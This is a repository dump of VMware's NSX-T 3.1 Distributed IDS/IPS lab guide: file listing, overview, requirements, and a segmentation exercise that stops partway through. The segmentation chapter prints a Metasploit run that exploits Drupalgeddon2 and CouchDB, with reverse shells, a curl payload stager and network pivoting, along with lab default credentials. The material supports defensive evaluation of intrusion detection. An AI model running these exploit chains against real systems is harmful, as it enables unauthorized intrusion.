├── 3.1
├── Nested Lab Deployment-3.1.ps1
├── README.md
└── docs
│ ├── 1-Requirements.md
│ ├── 10-Segmentation.md
│ ├── 11-Conclusion.md
│ ├── 2-CustomizeScript.md
│ ├── 3-RunScript.md
│ ├── 4-VerifyDeployment.md
│ ├── 5-InitialConfiguration.md
│ ├── 6-DetectingASimpleIntrusion.md
│ ├── 7-DetectinganAdvancedAttack.md
│ ├── 8-AdvancedConfiguration-302.md
│ ├── 8-PreventinganAttack.md
│ ├── 9-Logging.md
│ ├── ClearingIDSEvents.md
│ └── assets
│ └── images
│ ├── IDPS_POC_1.PNG
│ ├── IDPS_POC_10.PNG
│ ├── IDPS_POC_11.PNG
│ ├── IDPS_POC_12.PNG
│ ├── IDPS_POC_13.PNG
│ ├── IDPS_POC_14.PNG
│ ├── IDPS_POC_15.PNG
│ ├── IDPS_POC_16.PNG
│ ├── IDPS_POC_17.PNG
│ ├── IDPS_POC_18.PNG
│ ├── IDPS_POC_19.PNG
│ ├── IDPS_POC_2.PNG
│ ├── IDPS_POC_20.PNG
│ ├── IDPS_POC_21.PNG
│ ├── IDPS_POC_22.PNG
│ ├── IDPS_POC_23.PNG
│ ├── IDPS_POC_24.PNG
│ ├── IDPS_POC_25.PNG
│ ├── IDPS_POC_26.PNG
│ ├── IDPS_POC_27.PNG
│ ├── IDPS_POC_27_SMALL.PNG
│ ├── IDPS_POC_28.gif
│ ├── IDPS_POC_29.gif
│ ├── IDPS_POC_3.PNG
│ ├── IDPS_POC_30.PNG
│ ├── IDPS_POC_31.PNG
│ ├── IDPS_POC_32.PNG
│ ├── IDPS_POC_33.PNG
│ ├── IDPS_POC_34.PNG
│ ├── IDPS_POC_35.PNG
│ ├── IDPS_POC_36.PNG
│ ├── IDPS_POC_37.PNG
│ ├── IDPS_POC_38.PNG
│ ├── IDPS_POC_39.PNG
│ ├── IDPS_POC_4.PNG
│ ├── IDPS_POC_40.PNG
│ ├── IDPS_POC_41.PNG
│ ├── IDPS_POC_42.PNG
│ ├── IDPS_POC_43.PNG
│ ├── IDPS_POC_44.PNG
│ ├── IDPS_POC_45.PNG
│ ├── IDPS_POC_46.PNG
│ ├── IDPS_POC_47.PNG
│ ├── IDPS_POC_48.PNG
│ ├── IDPS_POC_49.PNG
│ ├── IDPS_POC_5.PNG
│ ├── IDPS_POC_50.PNG
│ ├── IDPS_POC_51.PNG
│ ├── IDPS_POC_52.PNG
│ ├── IDPS_POC_53.PNG
│ ├── IDPS_POC_54.PNG
│ ├── IDPS_POC_55.PNG
│ ├── IDPS_POC_56.PNG
│ ├── IDPS_POC_57.PNG
│ ├── IDPS_POC_58.PNG
│ ├── IDPS_POC_59.PNG
│ ├── IDPS_POC_6.PNG
│ ├── IDPS_POC_60.PNG
│ ├── IDPS_POC_61.PNG
│ ├── IDPS_POC_62.PNG
│ ├── IDPS_POC_7.PNG
│ ├── IDPS_POC_8.PNG
│ ├── IDPS_POC_9.PNG
│ ├── NSX_Logo.jpeg
│ └── placeholder.tmp
├── Images
├── IDPS_POC_1.PNG
├── IDPS_POC_10.PNG
├── IDPS_POC_11.PNG
├── IDPS_POC_12.PNG
├── IDPS_POC_13.PNG
├── IDPS_POC_14.PNG
├── IDPS_POC_18.PNG
├── IDPS_POC_2.PNG
├── IDPS_POC_3.PNG
├── IDPS_POC_4.PNG
├── IDPS_POC_40.PNG
├── IDPS_POC_41.PNG
├── IDPS_POC_42.PNG
├── IDPS_POC_5.PNG
├── IDPS_POC_6.PNG
├── IDPS_POC_7.PNG
├── IDPS_POC_8.PNG
├── IDPS_POC_9.PNG
├── placeholder.tmp
├── screenshot-1.png
└── screenshot-2.png
├── Nested Lab Deployment-3.1.ps1
├── Nested Lab Deployment.ps1
├── README.md
└── docs
├── 1-Requirements.md
├── 10-Conclusion.md
├── 2-CustomizeScript.md
├── 3-RunScript.md
├── 4-VerifyDeployment.md
├── 5-InitialConfiguration.md
├── 6-BasicAttackScenario.md
├── 7-LateralMovementScenario.md
├── 8-AdvancedConfiguration-302.md
├── 8-AdvancedConfiguration.md
├── 9-Segmentation.md
├── ClearingIDSEvents.md
└── assets
└── images
├── IDPS_POC_1.PNG
├── IDPS_POC_10.PNG
├── IDPS_POC_11.PNG
├── IDPS_POC_12.PNG
├── IDPS_POC_13.PNG
├── IDPS_POC_14.PNG
├── IDPS_POC_15.PNG
├── IDPS_POC_16.PNG
├── IDPS_POC_17.PNG
├── IDPS_POC_18.PNG
├── IDPS_POC_19.PNG
├── IDPS_POC_2.PNG
├── IDPS_POC_20.PNG
├── IDPS_POC_21.PNG
├── IDPS_POC_22.PNG
├── IDPS_POC_23.PNG
├── IDPS_POC_24.PNG
├── IDPS_POC_25.PNG
├── IDPS_POC_26.PNG
├── IDPS_POC_27.PNG
├── IDPS_POC_27_SMALL.PNG
├── IDPS_POC_28.gif
├── IDPS_POC_29.gif
├── IDPS_POC_3.PNG
├── IDPS_POC_30.PNG
├── IDPS_POC_31.PNG
├── IDPS_POC_32.PNG
├── IDPS_POC_33.PNG
├── IDPS_POC_34.PNG
├── IDPS_POC_35.PNG
├── IDPS_POC_36.PNG
├── IDPS_POC_37.PNG
├── IDPS_POC_38.PNG
├── IDPS_POC_39.PNG
├── IDPS_POC_4.PNG
├── IDPS_POC_40.PNG
├── IDPS_POC_41.PNG
├── IDPS_POC_42.PNG
├── IDPS_POC_43.PNG
├── IDPS_POC_44.PNG
├── IDPS_POC_45.PNG
├── IDPS_POC_46.PNG
├── IDPS_POC_5.PNG
├── IDPS_POC_6.PNG
├── IDPS_POC_7.PNG
├── IDPS_POC_8.PNG
├── IDPS_POC_9.PNG
├── NSX_Logo.jpeg
└── placeholder.tmp
/3.1/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | # NSX-T 3.1 - Distributed IDS/IPS Evaluation and Lab Guide
6 |
7 |
8 |
9 |
10 |
11 | ---
12 | ## Overview
13 | The goal of this evaluation is to allow customers to get hands-on experience with the [NSX Distributed IDS/IPS](https://www.vmware.com/products/nsx-distributed-ids-ips.html). The expectation from people participating in the PoV is that they will complete the exercises outline in this guide in order to become familair with the key capabilities offered by the NSX Distributed IDS/IPS. While not the focus of this guide, particpants will also gain basic experience with the Distributed Firewall and other NSX capabilities during this evaluation process.
14 |
15 | While this guide is quite prescriptive, participants can choose to modify any part of the workflow as desired. The guide is primarily focused on getting customers familiar with IDS/IPS, hence **the deployment of the lab environment and rest of the configuration is automated through the use of a provided PowerShell script**. After meeting the-requisites and running the script, a fully configured nested NSX-T environment is available to particpants, including a number of attacker and victim workload which are used as part of the IDS/IPS exercises. Once the nested lab has been deployed, the lab guide walks users through a number of attack scenarios, using tools like **Metasploit** to showcase the value of the NSX Distributed IDS/IPS.
16 | If you already have the lab deployed, you can skip module 1-4 of this guide.
17 |
18 | ## Introducing the VMware Service-defined Firewall
19 |
20 | 
21 |
22 | The VMware Service-defined firewall is VMware’s solution to secure east-to-west traffic across multi-cloud environments and is made up of 3 main components. First of all, we have our distributed firewall, which enables micro-segmentation. The distributed firewall is in essence an in kernel firewall that sits at the vNIC of every workload in the environment, enabling any level of filtering, micro-segmentation between the tiers of an application, or macro-segmentation for example isolating production from development workloads, or anything in between, completely independent of the underlying networking. Over the last few years, we’ve evolved the distributed firewall into a full Layer 7 stateful firewall.
23 |
24 | NSX Intelligence is our distributed Visibility and analytics platform, fully integrated into NSX and provide visibility of all flows without having to rely on traditional mechanism such as Netflow or copying all traffic and also provide policy formulation which enables customers to get to full micro-segmentation much quicker. And with NSX-T 3.0 we’ve added in the distributred IDS/IPS which is based on the same distributed architecture, now for the first time, enabling customers to have a network based IDS/IPS that sits at the VNIC of every workload, with the ability to intercept every flow, without having to hairpin any traffic regardless of network connectivity.
25 |
26 | ## Introducing the NSX Distributed IDS/IPS
27 |
28 | One of the key challenges with traditional network-based IDS/IPS solutions is that they rely on a massive amount of traffic to be hairpinned or copied across to the centralized IPS appliance. This often involves network architecture and also means that growing organizations have to continuously keep adding firewalls or IDS appliances to their centralized cluster to keep up with the growing amount of traffic that needs inspection.
29 | Another challenge with these solutions is that they don't offer protection against lateral movement of attacks within a particular network segment. If we have two application workload deployed here in the same VLAN, there isn’t any feasible way to insert an inline IPS appliance in between these workloads and repeat that for all the workloads in your entire datacenter.
30 | Furthermore, in virtualized datacenters, by leveraging DRS and vmotion, workloads often move to other hosts, clusters or datacenters. This means that traffic now gets redirected to another IPS appliance which has no context of existing flow and may even have a different policy applied
31 | Finally, centralized, network based IDS/IPSes have very little understanding of the context of a flow. They just look at network traffic without known much about where the flow originated and whether or not target of an attack is potentially vulnerable. As a result, all traffic needs to be matches against several thousands of signatures. Signatures that are detecting an exploit against an vulnerability on apache are also applied to a server that runs Mysql and so on. This results in two key challenges, one being a high number of false positives which make it difficult for a security operator to distinct important events that require immediate action from all the other ones, especially if the events don’t include context about who the victim is and what’s running on that victim machine. A second challenge with having to run all traffic through all signatures is that it significantly reduces throughput.
32 |
33 | The NSX Distributed IDS/IPS combines some of the best qualities of host based IPS solutions with the best qualities of network bases IPS solutions to provide a radically different solution which enables Intrusion Detection and Prevention at the granularity of a workload and the scale of the entire datacenter.
34 |
35 | Similar to the operational model of the distributed firewall, the NSX distributed IDS/IPS is deployed in the hypervisor when NSX-T is enabled on that hypervisor. It does not require the deployment of any additional appliances on that hypervisor, on the guest VM or anywhere in the network.
36 |
37 | Instead of hairpining traffic to a centralized IDS appliance across the network, IDS is applied right at the source or destination of the flow as it leaves a workloads or comes in. As is the case with our distributed firewall, this also means that there is need need to re-architect the network to apply IDS/IPS, and this also means that we can inspect traffic between workloads regardless of whether these workloads are the same vlan or logical segment or a different VLAN. The Distributed Firewall and IDS/IPS is applied to the traffic even before it hits the distributed switch. Almost invariably, the actual objective of an attack is not the same as where the attacker initially gained access, this means that an attacker will try to move through the environment in order to get to steal the valuable data they are after. Hence being able to not just defend against the initial attack vector, but also against lateral movement is criticial. Micro-segmentation using the distributed firewall is key in reducing the attack surface and makes lateral movement a lot more difficult, and now for the first time becomes operationally feasible to front-end each of your workloads with an Intrusion Detection and Prevention service to detect and block attempts at exploiting vulnerabilities wherever they may exist and regardless of whether the attacker is trying to gain initial access in the environment, or has already compromised a workload on the same VLAN and is now trying to move laterally to their target database on that same VLAN.
38 |
39 | Our largest and most successful customers heavily rely on context to micro-segment their environment. They leverage security-groups based on tags and other constructs to create a policy that is tied directly to the application itself rather than to network constructs like IP addresses and ports. This same context is also a very important differentiation which solves two key challenges seen with traditional IDS and IPS solutions. First of all, because of being embedded in the hypervisor we have access to a lot more context than we could just learn by sitting on the network. We know for instance the name of each workload and, the application it’s part of and so on. VMware tools and the Guest Introspection framework can provide us with additional context such as the version of the operating system that is running on each guest and even what process or user has generated a particular flow . If a database server is known to be vulnerable to a specific vulnerability that is being exploited right now, it obviously warrants immediate attention while a network admin triggering an IPS signature by running as scan should be far less of an immediate concern.
40 |
41 | In addition to enabling the appropriate prioritization, the same context can also be used to reduce the number of false positives, and increase the number of zero-false-positive workloads, as we have a good idea whether or not a target is potentially vulnerable, therefore reducing the amount of alerts that are often overwhelming with a traditional network-based solution. Finally, leveraging context, we can enable only the signatures that are relevant to the workloads we are protecting. If the distributed IDS instance applied to an Apache server, we can enable only the signatures that are relevant and not the vast majority of signatures that are irrelevant to this workload. This drastically reduces the performance impact seen with traditional IDS/IPS.
42 |
43 | ---
44 | ## Disclaimer and acknowledgements
45 | This lab provides and leverages common pen-test tools including Metasploit as well as purposfully vulnerable workloads built using Vulhub (https://github.com/vulhub/vulhub) . Please only use these tools for the intended purpose of completing the PoC, isolate the lab environment properly from any other environment and discard when the PoC has been completed.
46 |
47 | The automation script is based on work done by [William Lam](https://github.com/lamw) with additional vSphere and NSX automation by [Madhu Krishnarao](https://github.com/madhukark)
48 |
49 | ---
50 | ## Changelog
51 |
52 | * **01/7/2021**
53 | * Completion of NSX-T 3.1 version of the guide
54 | * **07/8/2020**
55 | * Intial partial draft of the guide
56 | * **08/18/2020**
57 | * Intial Completed guide
58 | ---
59 | ## Intended Audience
60 | This Evalution guide is intended for existing and future NSX customers who want to evaluate the NSX Distributed IDS/IPS functionality. Ideally, the evaluation process involves people covering these roles:
61 |
62 | * CISO Representative
63 | * Data Center Infrastructure Team
64 | * Network Architects
65 | * Security Architects
66 | * Security Operations Center Analyst
67 | * Enterprise Application Owner
68 |
69 | ---
70 | ## Resources commitment and suggested timeline
71 | The expected time commitment to complete the evaluation process is about 6 hours. This includes the time it takes for the automated deployment of the nested lab environment. We suggest to split up this time across 2 week. The below table provides an estimate of the time it takes to complete each task:
72 |
73 | | Task | Estimated Time to Complete | Suggested Week |
74 | | ------------- | ------------- | ------------- |
75 | | Customize Deployment Script Variables | 30 minutes | Week 1 |
76 | | Run Deployment Script | 90 minutes | Week 1 |
77 | | Verify Lab Deployment | 30 minutes | Week 1 |
78 | | Initial IDS/IPS Configuration | 30 minutes | Week 1 |
79 | | Detecting a Simple Intrusion | 30 minutes | Week 2 |
80 | | Detecting an Advanced Attack | 60 minutes | Week 2 |
81 | | Preventing an Attack | 30 minutes | Week 2 |
82 | | Optional: Logging to an external collector | 30 minutes | Week 2 |
83 | | Optional: Segmenting the Environment| 60 minutes | Week 2 |
84 |
85 | ---
86 | ## Support during the evaluation Process
87 |
88 | Existing NSX customers should reach out to their NSX account team for support during the evaluation process.
89 |
90 | ---
91 | ## Table of Contents
92 | * [Requirements](docs/1-Requirements.md)
93 | * [Customize Deployment Script](docs/2-CustomizeScript.md)
94 | * [Run Deployment Script](docs/3-RunScript.md)
95 | * [Verify Lab Deployment](docs/4-VerifyDeployment.md)
96 | * [Initial IDS/IPS Configuration](docs/5-InitialConfiguration.md)
97 | * [Detecting a simple Intrusion](docs/6-DetectingASimpleIntrusion.md)
98 | * [Detecting an Advanced Attack](docs/7-DetectinganAdvancedAttack.md)
99 | * [Preventing an Attack](docs/8-PreventinganAttack.md)
100 | * [Optional: Logging to an external collector](docs/9-Logging.md)
101 | * [Optional: Segmenting the Environment](docs/10-Segmentation.md)
102 | * [Conclusion](docs/11-Conclusion.md)
103 |
104 | [***Next Step: 1. Requirements***](docs/1-Requirements.md)
105 |
--------------------------------------------------------------------------------
/3.1/docs/1-Requirements.md:
--------------------------------------------------------------------------------
1 |
2 | ## 1. Requirements
3 | ### Introduction to the Lab Deployment Script
4 | Along with this evaluation guide, we are providing a [script](https://github.com/vmware-nsx/eval-docs-ids-ips/blob/master/Nested%20Lab%20Deployment-3.1.ps1) which automated the lab environment deployment. This script makes it very easy for anyone to deploy a nested vSphere vSphere lab environment for learning and educational purposes. All required VMware components (ESXi, vCenter Server, NSX Unified Appliance and Edge) are automatically deployed, attacker and multiple victim workloads are deplyed, and NSX-T networking configuration is applied in order to anyone to start testing the NSX Distributed IDS/IPS as soon as the deploment is completed.
5 |
6 | Below is a diagram of what is deployed as part of the solution and you simply need to have an existing vSphere environment running that is managed by vCenter Server and with enough resources (CPU, Memory and Storage) to deploy this "Nested" lab
7 |
8 | 
9 |
10 | * Gray: Pre-requisites (Physical ESXi Server, vCenter managing the server and a Port group to provide connectivity of nested lab environment
11 | * Blue: Management and Edge Components (vCenter, NSX Manager and NSX Edge) Deployed by PowerCLI Script
12 | * Red: External VM running Metasploit and other functions deployed by PowerCLI Script on Physical Environment vCenter
13 | * Yellow: Nested ESXi hypevisors deployed by PowerCLI Script and managed by nested vCenter
14 | * Purple: vSAN datastore across 3 nested ESXi hypervisors configured by PowerCLI Script
15 | * Green: NSX Overlay DMZ Segment and vulnerable Web-VMs connected to it. Segment created and VMs deployed by PowerCLI Script.
16 | * Orange: NSX Overlay Internal Segment and vulnerable App-VMs connected to it. Segment created and VMs deployed by PowerCLI Script.
17 |
18 | ### Physical Lab Requirements
19 | Here are the requirements for NSX-T Distributed IDS/IPS Evaluation
20 |
21 | #### vCenter
22 | * vCenter Server running at least vSphere 6.7 or later
23 | * If your physical storage is vSAN, please ensure you've applied the following setting as mentioned [here](https://www.virtuallyghetto.com/2013/11/how-to-run-nested-esxi-on-top-of-vsan.html)
24 |
25 | #### Compute
26 | * Single Physical host running at least vSphere 6.7 or later
27 | * Ability to provision VMs with up to 8 vCPU
28 | * Ability to provision up to 64 GB of memory
29 |
30 | #### Network
31 | * Single pre-configured Standard or Distributed Portgroup (Management VLAN) used to connect the below components of the nested environment, in my example, VLAN-194 is used as this single port-group
32 | * 8 x IP Addresses for VCSA, ESXi, NSX-T Manager, Edge VM Management, Edge VM Uplink and External VM
33 | * 4 x IP Addresses for TEP (Tunnel Endpoint) interfaces on ESXi and Edge VM
34 | * 1 x IP Address for T0 Static Route (optional)
35 | * All IP Addresses should be able to communicate with each other. These can all be in the same subnet (/27). In the example configuration provided the 10.114.209.128/27 subnet is used for all these IP addresses/interfaces: vCenter, NSX Manager Managenet Interface, T0 Router Uplink, Nested ESXi VMKernel and TEP interfaces (defined in IP pool), External VM.
36 |
37 | #### Storage
38 | * Ability to provision up to 1TB of storage
39 |
40 | #### Other
41 | * Desktop (Windows, Mac or Linux) with latest PowerShell Core and PowerCLI 12.0 Core installed. See [ instructions here](https://blogs.vmware.com/PowerCLI/2018/03/installing-powercli-10-0-0-macos.html) for more details
42 |
43 |
44 | ### OVAs and images for the nested Lab
45 | * vSphere 7 & NSX-T OVAs:
46 | * [vCenter Server Appliance 7.0.0B](https://my.vmware.com/group/vmware/downloads/details?downloadGroup=VC700B&productId=974&rPId=47905)
47 | * [NSX-T Manager 3.1.0 OVA](https://my.vmware.com/group/vmware/downloads/details?downloadGroup=NSX-T-310&productId=982&rPId=56490)
48 | * [NSX-T Edge 3.1.0 for ESXi OVA](https://my.vmware.com/group/vmware/downloads/details?downloadGroup=NSX-T-310&productId=982&rPId=56490)
49 | * [Nested ESXi 7.0 OVA - Build 15344619](https://download3.vmware.com/software/vmw-tools/nested-esxi/Nested_ESXi7.0_Appliance_Template_v1.ova)
50 | * External VM and Victim VM OVA - Links to these will be provided to PoV participants by their NSX account team.
51 | * Preferrably, the deployed NSX Manager should have Internet access in order to download the lastest set of IDS/IPS signatures.
52 |
53 | > **Note**: if you are not entitled or not able to access the above links, you can download a free trial and obtain a license for all of the above through https://www.vmware.com/try-vmware.html
54 | > **Note**: in order to use IDS/IPS you to provide either an evaluation license or an NSX ATP Subscription license
55 |
56 |
57 | ---
58 |
59 | [***Next Step: 2. Customize Deployment Script***](2-CustomizeScript.md))
60 |
61 |
--------------------------------------------------------------------------------
/3.1/docs/10-Segmentation.md:
--------------------------------------------------------------------------------
1 |
2 | ## 10. Segmenting the Environment
3 | **Estimated Time to Complete: 60 minutes**
4 |
5 | In this optional exercise, we will leverage the **Distributed Firewall** in order to limit the attack surface.
6 | First, we will apply a **Macro-segmentation** policy which will isolate our **Production** environment and the applications deployed in it from the **Development** environment.
7 | Then, we will implement a **Micro-segmentation** policy, which will employ an **allow-list** to only allow the flows required for our applications to function and block everything else.
8 |
9 | **IMPORTANT**: Prior to this exercise, change the **Mode** for both the **App-Tier** and **Web-Tier** IDS/IPS policy back to **Detect Only**.
10 |
11 | **Macro-Segmentation: Isolating the Production and Development environnments**
12 |
13 | The goal of this exercise is to completley isolate workloads deployed in **Production** from workloads deployed in **Development**. All nested workloads were previously tagged to identify which of these environments they were deployed in, and earlier in this lab, you created groups for **Production Applications** and **Development Applications** respecively. In the next few steps, you will create the appropriate firewall rules to achieve this, and then run through the **lateral movement** attack scenario again to see how lateral movement has now been limited to a particular environment.
14 |
15 | ***Create a Distributed Firewall Environment Category Policy***
16 | 1. In the NSX Manager UI, navigate to Security --> Distributed Firewall
17 | 2. Click on the **Environments(0)** Category tab.
18 | 3. Click **ADD POLICY**
19 | 4. Click **New Policy** and change the name of the policy to **Environment Isolation**
20 | 5. Check the checkbox next to the **Environment Isolation** Policy
21 | 6. Click **ADD RULE** twice, and configure the cnew new rules as per below setps
22 | 7. Rule 1
23 | * Name: **Isolate Production-Development**
24 | * Source: **Production Applications**
25 | * Destination: **Development Applications**
26 | * Services: **ANY**
27 | * Profiles: **NONE**
28 | * Applied To: **Production Applications** , **Development Applications**
29 | * Action: **Drop**
30 | 8. Rule 2
31 | * Name: **Isolate Development-Production**
32 | * Source: **Development Applications**
33 | * Destination: **Production Applications**
34 | * Services: **ANY**
35 | * Profiles: **NONE**
36 | * Applied To: **Production Applications** , **Development Applications**
37 | * Action: **Drop**
38 |
39 | 
40 |
41 | 9. Click **Publish** to publish these rules to the **Distributed Firewall**.
42 |
43 | ***Open a SSH/Console session to the External VM***
44 | 1. If your computer has access to the IP address you've assigend to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
45 | * Username **vmware**
46 | * Password **VMware1!**
47 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
48 |
49 | ***Run through the the lateral attack scenario (again)***
50 |
51 | In order to reduce the time needed for this, you can run the **attack2** script from the **external VM** which will initiate the complete lateral attack scenario without needing any manual metasploit steps. If you prefer, you can also manually go though these steps (See the chapter on Lateral Movement Scenario)
52 |
53 | 1. If you have not previously used this script, you will need to modify it to reflect your environment. Type **sudo nano attack2.rc** and replace the **RHOST** and **LHOST** IP addresses accordingly to match with the IP addresses in your environment.
54 | * **RHOST** on line 3 should be the IP address of the App1-WEB-TIER VM
55 | * **SUBNET** on line 6 (route add) should be the Internal Network subnet
56 | * **LHOST** on line 9 should be the IP address of the External VM (this local machine)
57 | * **RHOST** on line 10 should be the IP address of the App1-APP-TIER VM
58 | * **RHOST** on line 13 should be the IP address of the App2-APP-TIER VM
59 | 2. Type **CTRL-O** and confirm to save your changes, then **CTRL-X** to exit **Nano**.
60 | 3. Type **sudo ./attack2.sh** to run the attack scenario
61 |
62 | > **Note**: This scripted attack does not upgrade shell sessions to meterpreter sessions nor does it interact with the sessions. To interact with the established sessions, but it will cause the same signatures to fire on the NSX IDS/IPS.
63 |
64 | ```console
65 |
66 | vmware@ubuntu:~$ sudo ./attack2.sh
67 | [sudo] password for vmware:
68 | [*] Starting thE Metasploit Framework console...\
69 |
70 | Call trans opt: received. 2-19-98 13:24:18 REC:Loc
71 |
72 | Trace program: running
73 |
74 | wake up, Neo...
75 | the matrix has you
76 | follow the white rabbit.
77 |
78 | knock, knock, Neo.
79 |
80 | (`. ,-,
81 | ` `. ,;' /
82 | `. ,'/ .'
83 | `. X /.'
84 | .-;--''--.._` ` (
85 | .' / `
86 | , ` ' Q '
87 | , , `._ \
88 | ,.| ' `-.;_'
89 | : . ` ; ` ` --,.._;
90 | ' ` , ) .'
91 | `._ , ' /_
92 | ; ,''-,;' ``-
93 | ``-..__``--`
94 |
95 | https://metasploit.com
96 |
97 |
98 | =[ metasploit v5.0.95-dev ]
99 | + -- --=[ 2038 exploits - 1103 auxiliary - 344 post ]
100 | + -- --=[ 562 payloads - 45 encoders - 10 nops ]
101 | + -- --=[ 7 evasion ]
102 |
103 | Metasploit tip: Search can apply complex filters such as search cve:2009 type:ex ploit, see all the filters with help search
104 |
105 | [*] Processing attack2.rc for ERB directives.
106 | resource (attack2.rc)> use exploit/unix/webapp/drupal_drupalgeddon2
107 | [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
108 | resource (attack2.rc)> set RHOST 192.168.10.101
109 | RHOST => 192.168.10.101
110 | resource (attack2.rc)> set RPORT 8080
111 | RPORT => 8080
112 | resource (attack2.rc)> exploit -z
113 | [*] Started reverse TCP handler on 10.114.209.151:4444
114 | [*] Sending stage (38288 bytes) to 192.168.10.101
115 | [*] Meterpreter session 1 opened (10.114.209.151:4444 -> 192.168.10.101:36632) a t 2020-08-18 09:23:54 -0500
116 | [*] Session 1 created in the background.
117 | resource (attack2.rc)> route add 192.168.20.0/24 1
118 | [*] Route added
119 | resource (attack2.rc)> use exploit/linux/http/apache_couchdb_cmd_exec
120 | [*] Using configured payload linux/x64/shell_reverse_tcp
121 | resource (attack2.rc)> set LPORT 4445
122 | LPORT => 4445
123 | resource (attack2.rc)> set LHOST 10.114.209.151
124 | LHOST => 10.114.209.151
125 | resource (attack2.rc)> set RHOST 192.168.20.100
126 | RHOST => 192.168.20.100
127 | resource (attack2.rc)> exploit -z
128 | [*] Started reverse TCP handler on 10.114.209.151:4445
129 | [*] Generating curl command stager
130 | [*] Using URL: http://0.0.0.0:8080/4u4h7sj6qJrKq
131 | [*] Local IP: http://10.114.209.151:8080/4u4h7sj6qJrKq
132 | [*] 192.168.20.100:5984 - The 1 time to exploit
133 | [*] Client 10.114.209.148 (curl/7.38.0) requested /4u4h7sj6qJrKq
134 | [*] Sending payload to 10.114.209.148 (curl/7.38.0)
135 | [*] Command shell session 2 opened (10.114.209.151:4445 -> 10.114.209.148:20667) at 2020-08-18 09:24:20 -0500
136 | [+] Deleted /tmp/zzdlnybu
137 | [+] Deleted /tmp/ltvyozbf
138 | [*] Server stopped.
139 | [*] Session 2 created in the background.
140 | resource (attack2.rc)> set LPORT 4446
141 | LPORT => 4446
142 | resource (attack2.rc)> set RHOST 192.168.20.101
143 | RHOST => 192.168.20.101
144 | resource (attack2.rc)> exploit -z
145 | [*] Started reverse TCP handler on 10.114.209.151:4446
146 | [-] Exploit aborted due to failure: unknown: Something went horribly wrong and w e couldn't continue to exploit.
147 | [*] Exploit completed, but no session was created.
148 | ```
149 |
150 | 4. Type **sessions -l** to confirm that this time, although the script tried to exploit the **APP1-WEB-TIER** then laterally move to **APP1-APP-TIER** and then move once more to **APP2-APP-TIER** only 2 reverse shell sessions were established
151 | * One from the **APP1-WEB-TIER** VM
152 | * One from the **APP1-APP-TIER** VM
153 |
154 | > **Note**: The exploit of the **APP2-APP-TIER** VM failed, because the Distributed Firewall policy you just configured isolated the **APP2** workloads that are part of the **Development Applications** Group (Zone) from the **APP1** workloads which are part of the **Production Applications** Group (Zone).
155 |
156 | ```console
157 | msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -l
158 |
159 | Active sessions
160 | ===============
161 |
162 | Id Name Type Information Connection
163 | -- ---- ---- ----------- ----------
164 | 1 meterpreter php/linux www-data (33) @ 273e1700c5be 10.114.209.151:4444 -> 192.168.10.101:36632 (192.168.10.101)
165 | 2 shell x64/linux 10.114.209.151:4445 -> 10.114.209.148:20667 (192.168.20.100)
166 | ```
167 |
168 | ***Confirm IDS/IPS Events show up in the NSX Manager UI***
169 | 1. In the NSX Manager UI, navigate to Security --> East West Security --> Distributed IDS
170 | 2. Confirm 3 signatures have fired:
171 | 4. Confirm 3 signatures have fired:
172 | * Signature for **DrupalGeddon2**, with **APP-1-WEB-TIER** as Affected VM
173 | * Signature for **Remote Code execution via a PHP script**, with **APP-1-WEB-TIER** as Affected VM
174 | * Signature for **Apache CouchDB Remote Privilege Escalation**, with **APP-1-APP-TIER** as Affected VM
175 |
176 | 
177 |
178 | > **Note**: Because the distributed firewall has isolated production from development workloads, we do not see the exploit attempt of the **APP2-APP-TIER** VM.
179 |
180 | This completes the Macro-segmentation exercise. Before moving to the next exercise, folow [these instructions](ClearingIDSEvents.md) to clear the IDS events from NSX Manager
181 |
182 | **Micro-Segmentation: Implementing a zero-trust network architecture for your applications**
183 |
184 | Now that we have isolated production from development workloads, we will micro-segment both of our applications by configuring an **allow-list** policty which explicitely only allows the flows required for our applications to fuction and blocks anything else. As a result, we will not only prevent lateral movement, but also prevent any reverse shell from being established.
185 |
186 | ***Create Granular Groups***
187 | 1. In the NSX Manager UI, navigate to Inventory --> Groups
188 | 2. Click **ADD GROUP**
189 | 3. Create a Group with the below parameters. Click Apply when done.
190 | * Name **APP1-WEB**
191 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-1 Scope Application** AND **Virtual Machine Tag Equals Web-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
192 | 
193 | 3. Create another Group with the below parameters. Click Apply when done.
194 | * Name **APP1-APP**
195 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-1 Scope Application** AND **Virtual Machine Tag Equals App-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
196 | 4. Create another Group with the below parameters. Click Apply when done.
197 | * Name **APP2-WEB**
198 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-2 Scope Application** AND **Virtual Machine Tag Equals Web-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
199 | 5. Create another Group with the below parameters. Click Apply when done.
200 | * Name **APP2-APP**
201 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-2 Scope Application** AND **Virtual Machine Tag Equals App-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
202 |
203 | 6. Confirm previously deployed VMs became a member of appropriate groups due to applied tags. Click **View Members** for the 4 groups you created and confirm
204 | * Members of **APP1-WEB**: **APP-1-WEB-TIER**
205 | * Members of **APP1-APP**: **APP-1-APP-TIER**.
206 | * Members of **APP2-WEB**: **APP-2-WEB-TIER**
207 | * Members of **APP1-WEB**: **APP-2-APP-TIER**.
208 |
209 | ***Create a Distributed Firewall Application Category Policy***
210 | 1. In the NSX Manager UI, navigate to Security --> Distributed Firewall
211 | 2. Click on the **Application(1)** Category tab.
212 | 3. Click **ADD POLICY**
213 | 4. Click **New Policy** and change the name of the policy to **APP1 Micro-Segmentation**
214 | 5. Check the checkbox next to the **APP1 Micro-Segmentation** Policy
215 | 6. Click **ADD RULE** twice, and configure the new new rules as per below steps
216 | 7. Rule 1
217 | * Name: **WEB-TIER-ACCESS**
218 | * Source: **Any**
219 | * Destination: **APP1-WEB**
220 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **8080** (The Drupal service listens on this port)
221 | * Profiles: **HTTP** (This is a Layer-7 App-ID)
